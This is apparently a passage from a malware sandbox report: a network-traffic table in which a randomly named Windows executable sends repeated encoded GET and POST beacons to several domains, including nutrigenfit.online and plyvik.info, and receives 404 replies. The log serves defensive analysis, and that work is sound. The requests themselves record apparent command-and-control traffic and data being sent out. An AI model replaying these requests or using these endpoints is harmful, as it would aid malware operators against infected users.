HH/qY/kF/MVpzf3UBcc3VVVEY6CSDsWpDk8Qr13ct77fEVuU3xItPbIngjnmnI8b+tKv0r64TvCQrCdUWO+88n5t7kVF4iD10/std5t6I4NT83a [TRUNCATED]
Nov 7, 2024 08:11:05.422693968 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 07 Nov 2024 07:11:05 GMT server: LiteSpeed vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
Nov 7, 2024 08:11:05.422712088 CET	271	IN	Data Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50030	163.44.176.12	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:11:07.095388889 CET	405	OUT	GET /mivl/?NbcPAHe=NCBdkbAo51Pk6OQBAnBxM8uFnkri8kZDRfsqOlllsQkjLkqguOrgRg1KSY2RNLpxIpBa/WYuubaTkbJsfRdnK/ix96hDlK/5VhHaQOJqN2apQeXMRtfwTm8=&9Pj=rz_D HTTP/1.1 Host: www.broork.sbs Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 7, 2024 08:11:07.962584019 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 07 Nov 2024 07:11:07 GMT server: LiteSpeed vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
Nov 7, 2024 08:11:07.962601900 CET	271	IN	Data Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50031	195.110.124.133	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:11:13.221466064 CET	696	OUT	POST /uye5/ HTTP/1.1 Host: www.nutrigenfit.online Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.nutrigenfit.online Referer: http://www.nutrigenfit.online/uye5/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 204 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 32 37 74 56 58 2f 46 51 2f 78 6b 61 6a 5a 44 69 65 6a 43 6a 50 56 39 6a 4d 64 4d 64 49 48 44 6a 30 75 71 52 62 30 2f 42 45 75 64 36 54 4c 6d 34 2b 68 36 2f 4d 49 52 4e 76 67 59 4e 76 6c 4f 6b 59 77 49 6b 62 34 4c 6b 47 4b 57 6b 44 7a 56 68 41 6e 6d 59 75 75 44 34 66 38 45 72 4a 70 42 54 72 37 4b 33 51 6f 62 76 79 57 67 66 6d 41 58 42 63 77 44 70 57 45 42 77 2f 6a 6c 38 6e 58 4b 61 76 4e 4a 62 51 35 50 68 6a 52 75 54 55 74 4e 78 4e 35 34 77 6b 4e 51 61 68 43 75 34 43 6b 4a 64 31 34 69 65 49 41 31 61 30 33 35 70 49 4f 79 69 43 6c 30 75 34 44 69 79 79 76 6c 76 6d 32 45 37 57 41 3d 3d Data Ascii: NbcPAHe=27tVX/FQ/xkajZDiejCjPV9jMdMdIHDj0uqRb0/BEud6TLm4+h6/MIRNvgYNvlOkYwIkb4LkGKWkDzVhAnmYuuD4f8ErJpBTr7K3QobvyWgfmAXBcwDpWEBw/jl8nXKavNJbQ5PhjRuTUtNxN54wkNQahCu4CkJd14ieIA1a035pIOyiCl0u4Diyyvlvm2E7WA==
Nov 7, 2024 08:11:14.054522991 CET	367	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 07:11:13 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50032	195.110.124.133	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:11:15.759059906 CET	716	OUT	POST /uye5/ HTTP/1.1 Host: www.nutrigenfit.online Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.nutrigenfit.online Referer: http://www.nutrigenfit.online/uye5/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 224 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 32 37 74 56 58 2f 46 51 2f 78 6b 61 6a 35 7a 69 5a 30 57 6a 4e 31 39 67 4a 64 4d 64 42 6e 44 76 30 75 57 52 62 31 72 52 46 63 70 36 53 70 75 34 39 6a 43 2f 4c 49 52 4e 6b 41 59 49 77 56 4f 72 59 77 4e 48 62 34 48 6b 47 4c 32 6b 44 32 70 68 41 55 4f 62 75 2b 44 36 65 4d 45 70 47 4a 42 54 72 37 4b 33 51 6f 65 41 79 57 6f 66 6d 54 66 42 63 52 44 75 66 6b 42 78 38 6a 6c 38 32 6e 4b 6b 76 4e 49 49 51 34 54 62 6a 53 61 54 55 76 46 78 55 49 34 78 39 64 52 52 2b 53 76 47 4f 45 59 79 7a 37 76 70 4b 6a 64 72 71 6d 51 4c 4a 49 2f 34 54 55 56 35 71 44 47 42 76 6f 73 62 72 31 35 79 4e 43 34 62 31 72 45 6c 52 4d 7a 4e 75 78 39 52 4b 73 44 68 4b 6b 59 3d Data Ascii: NbcPAHe=27tVX/FQ/xkaj5ziZ0WjN19gJdMdBnDv0uWRb1rRFcp6Spu49jC/LIRNkAYIwVOrYwNHb4HkGL2kD2phAUObu+D6eMEpGJBTr7K3QoeAyWofmTfBcRDufkBx8jl82nKkvNIIQ4TbjSaTUvFxUI4x9dRR+SvGOEYyz7vpKjdrqmQLJI/4TUV5qDGBvosbr15yNC4b1rElRMzNux9RKsDhKkY=
Nov 7, 2024 08:11:16.587081909 CET	367	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 07:11:16 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50033	195.110.124.133	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:11:18.311646938 CET	10798	OUT	POST /uye5/ HTTP/1.1 Host: www.nutrigenfit.online Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.nutrigenfit.online Referer: http://www.nutrigenfit.online/uye5/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10304 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 32 37 74 56 58 2f 46 51 2f 78 6b 61 6a 35 7a 69 5a 30 57 6a 4e 31 39 67 4a 64 4d 64 42 6e 44 76 30 75 57 52 62 31 72 52 46 63 78 36 53 61 32 34 2b 45 75 2f 4b 49 52 4e 74 67 59 4a 77 56 4f 4d 59 77 31 62 62 34 37 53 47 50 47 6b 43 55 78 68 43 6c 4f 62 6c 2b 44 36 62 38 45 6f 4a 70 42 47 72 34 79 7a 51 6f 4f 41 79 57 6f 66 6d 53 50 42 56 67 44 75 54 45 42 77 2f 6a 6c 4f 6e 58 4b 66 76 4e 41 59 51 34 57 35 6a 68 43 54 61 76 56 78 50 61 41 78 31 64 52 54 39 53 76 4f 4f 45 55 74 7a 37 44 66 4b 69 70 4e 71 6c 4d 4c 4c 65 57 58 58 56 46 5a 39 43 71 6e 30 4a 46 35 6b 6b 64 68 4c 43 41 48 38 35 38 74 4c 49 44 34 31 68 38 65 61 35 44 69 65 52 6c 6d 58 4f 71 39 78 61 73 72 56 4d 45 5a 2f 70 38 31 79 58 6c 4b 58 56 67 69 48 6f 70 42 79 34 73 73 64 64 68 42 32 42 70 37 6d 32 63 49 4b 70 6d 4b 57 43 66 6b 5a 4f 7a 39 7a 46 34 50 7a 6b 5a 67 4e 68 76 43 59 63 5a 46 42 38 61 48 67 42 68 5a 58 53 62 47 77 76 70 71 62 52 48 7a 77 5a 49 6c 36 2b 6d 39 74 6f 6a 62 75 44 76 57 54 42 63 69 6b 52 [TRUNCATED] Data Ascii: NbcPAHe=27tVX/FQ/xkaj5ziZ0WjN19gJdMdBnDv0uWRb1rRFcx6Sa24+Eu/KIRNtgYJwVOMYw1bb47SGPGkCUxhClObl+D6b8EoJpBGr4yzQoOAyWofmSPBVgDuTEBw/jlOnXKfvNAYQ4W5jhCTavVxPaAx1dRT9SvOOEUtz7DfKipNqlMLLeWXXVFZ9Cqn0JF5kkdhLCAH858tLID41h8ea5DieRlmXOq9xasrVMEZ/p81yXlKXVgiHopBy4ssddhB2Bp7m2cIKpmKWCfkZOz9zF4PzkZgNhvCYcZFB8aHgBhZXSbGwvpqbRHzwZIl6+m9tojbuDvWTBcikRoxsp/m9FjuU3MSC2syWEckYscbFAyV3Es8W8D6Ud34ki2Mt/4jbOdT5hFPMxKsUrcAvwaulSLQ12yA9vkJs6bGwKXZktUo6YRzYoO9pG8bp2GDqDS2AdNUeAYx0GH0kiIrII9zOKDjqQ9cmLSpWZy59j3663nUSBkhoN22bHsV1lEjT1bsih6ESA+Cylwssacqhj0VMMCFaAp50kuOnR2+BCnXn6hwgFbnSrOqbPp/Np1r/hXF1BPUQLRIDayMzVDZegoizsSTNdNZ8h6T67baHvpCjvZUSwYyWbNFRqE2vUaZmi4lrRulI8OnoL+RwMnOhw25keI/OsSUCy4nLl2D5OyxB7UXa1SXr8eIVB9Z+18ouYoThKC8iy5edDn9eOFvoiVM1XVyfudLLyPfVguMtMQfHX/13EkMBKsZ1k04VBSkuBIWLPQQbrdIgBC23SaL1jxgJapDBtUhL8KvpLp5CpF7EIgpWzEOgRl8MxgfZR+TetMlF/6uAOHNLEjcwijzcEMJqcgaHG1VqJ3j6TBwY2z5kHwaDN5RKtPvcEIEVmF344UfhhMT02GrttIEiySIe1yEl0lOQxQqr0FTtxyTLshySqI/b4F1Ed0WxP4Np7ToAuwEvoM51VIyhfd/glzhaaYJ5gJk3pblrbhAQKrs2DxGq3dR0ere [TRUNCATED]
Nov 7, 2024 08:11:19.140605927 CET	367	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 07:11:19 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50034	195.110.124.133	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:11:20.853399038 CET	413	OUT	GET /uye5/?9Pj=rz_D&NbcPAHe=75F1ULhw6FwEjpnAOUSbF21mK8NkBCS+6cO+diyrF+sYFY6hrAWtaaFZiFMruwmlEHMkL4DDBtvLLE4rNUa6rLiKH/gwOIhUvbn1b/q8x18okz/4WQ7XajQ= HTTP/1.1 Host: www.nutrigenfit.online Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 7, 2024 08:11:21.693216085 CET	367	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 07:11:21 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50035	67.223.117.142	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:11:26.876295090 CET	675	OUT	POST /ak8m/ HTTP/1.1 Host: www.plyvik.info Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.plyvik.info Referer: http://www.plyvik.info/ak8m/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 204 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 6d 6c 4e 6a 69 79 6b 7a 46 6a 6b 62 47 4e 2b 52 33 32 69 4a 76 30 44 6b 6b 54 63 55 69 42 7a 34 78 63 45 38 2b 5a 39 67 6b 49 68 56 4a 38 57 34 39 50 62 4d 31 78 32 59 79 54 5a 79 44 65 58 54 54 4a 71 71 6b 2f 35 51 44 4e 4a 62 38 42 2f 6b 38 30 4c 6e 58 56 32 4a 4f 7a 5a 65 53 6b 45 58 45 31 4f 4a 38 74 69 65 34 74 6c 70 41 39 67 73 67 32 46 49 4d 4e 65 46 59 72 79 4f 54 76 7a 58 79 31 55 59 55 4d 34 48 47 39 42 50 69 66 38 2b 70 5a 2f 53 78 6d 46 6c 74 44 7a 4e 57 76 65 78 75 74 59 68 6e 50 78 2f 57 6a 4c 46 7a 56 4c 6f 48 2b 6f 66 5a 48 49 77 62 64 67 44 7a 4f 54 43 6c 51 3d 3d Data Ascii: NbcPAHe=mlNjiykzFjkbGN+R32iJv0DkkTcUiBz4xcE8+Z9gkIhVJ8W49PbM1x2YyTZyDeXTTJqqk/5QDNJb8B/k80LnXV2JOzZeSkEXE1OJ8tie4tlpA9gsg2FIMNeFYryOTvzXy1UYUM4HG9BPif8+pZ/SxmFltDzNWvexutYhnPx/WjLFzVLoH+ofZHIwbdgDzOTClQ==
Nov 7, 2024 08:11:27.563663006 CET	533	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 07:11:27 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50036	67.223.117.142	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:11:29.429464102 CET	695	OUT	POST /ak8m/ HTTP/1.1 Host: www.plyvik.info Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.plyvik.info Referer: http://www.plyvik.info/ak8m/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 224 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 6d 6c 4e 6a 69 79 6b 7a 46 6a 6b 62 48 74 4f 52 32 52 2b 4a 6b 30 44 37 68 54 63 55 6f 68 7a 38 78 63 41 38 2b 59 49 39 6b 37 46 56 4b 65 4f 34 2b 4e 2f 4d 32 78 32 59 36 7a 5a 7a 41 75 58 63 54 4a 6d 4d 6b 36 42 51 44 4e 74 62 38 45 62 6b 38 44 6e 67 58 46 32 4c 49 7a 5a 59 4b 45 45 58 45 31 4f 4a 38 73 47 6b 34 75 56 70 41 4e 77 73 6a 54 78 48 53 64 65 47 51 4c 79 4f 45 66 7a 54 79 31 56 4e 55 4e 6b 74 47 37 4e 50 69 66 73 2b 70 6f 2f 52 34 6d 46 5a 6a 6a 7a 59 65 64 50 6d 71 4f 30 76 68 2b 31 4b 66 52 50 32 79 54 47 79 57 50 4a 49 4c 48 73 44 47 61 70 33 2b 4e 75 4c 2b 62 32 6d 56 48 31 53 64 46 63 36 72 75 52 73 34 2b 62 64 2b 